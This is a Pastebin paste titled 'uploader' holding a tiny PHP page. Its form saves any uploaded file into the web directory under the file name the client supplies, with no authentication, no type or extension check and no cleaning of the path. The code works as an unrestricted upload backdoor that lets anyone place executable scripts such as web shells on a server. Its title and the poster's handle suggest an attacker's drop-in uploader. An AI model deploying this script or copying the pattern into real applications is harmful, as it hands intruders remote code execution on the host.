snip3r_ir

uploader

Apr 21st, 2015
364
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.40 KB | None | 0 0
  1. <html>
  2.     <head>
  3.     </head>
  4. <body>
  5.     <p>hello</p>
  6. <form method="post" action="" enctype="multipart/form-data" >
  7. <input type="file" name="ali">
  8. <input type="submit" name="submit">
  9. </form>
  10.  
  11.  
  12.  
  13. <?php
  14. if(isset($_POST['submit']))
  15. {
  16.         $tmp_name = $_FILES["ali"]["tmp_name"];
  17.         $name = $_FILES["ali"]["name"];
  18.         copy($tmp_name, $name);
  19.         echo "done";
  20. }
  21. ?>
  22. </body>
  23. </html>
Advertisement
Add Comment
Please, Sign In to add comment